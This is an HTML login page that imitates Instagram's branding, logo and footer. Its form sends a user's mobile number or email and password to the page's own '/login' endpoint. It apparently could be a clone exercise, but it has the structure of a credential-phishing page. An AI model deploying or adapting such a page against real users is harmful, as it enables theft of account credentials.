<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="icon" type="image/png" sizes="32x32" href="./assets/favicon.png" />
    <link rel="stylesheet" href="style.css" />
    <title>Sign up - Instagram</title>
</head>

<body>
    <div class="wrapper">
        <form action="/login" method="POST" class="form login">
            <div><img src="assets/instalogo.png" alt="" /></div>
            <div class="input-container">
                <input type="text" name="mobemail" id="mobemail" placeholder="Mobile Number or Email" />
                <input type="password" name="password" id="password" placeholder="Password" />
            </div>
            <input type="submit" value="Log in" class="padding signupbtn">

            <div class="fpass">
                <p>Forgot password ?</p>
            </div>
        </form>

        <div class="downform">
            <p>Don't have an account? <a href="/signup">Sign up</a></p>
        </div>

        <div class="footer">
            <ul>
                <li>Meta</li>
                <li>About</li>
                <li>Blog</li>
                <li>Jobs</li>
                <li>Help</li>
                <li>API</li>
                <li>Privacy</li>
                <li>Cookie Settings</li>
                <li>Terms</li>
                <li>Locations</li>
                <li>Instagram Lite</li>
                <li>Threads</li>
                <li>Contact Uploading & Non-Users</li>
                <li>Meta Verified</li>
            </ul>
            <p>&copy; 2024 Instagram from Meta</p>
        </div>
    </div>
</body>

</html>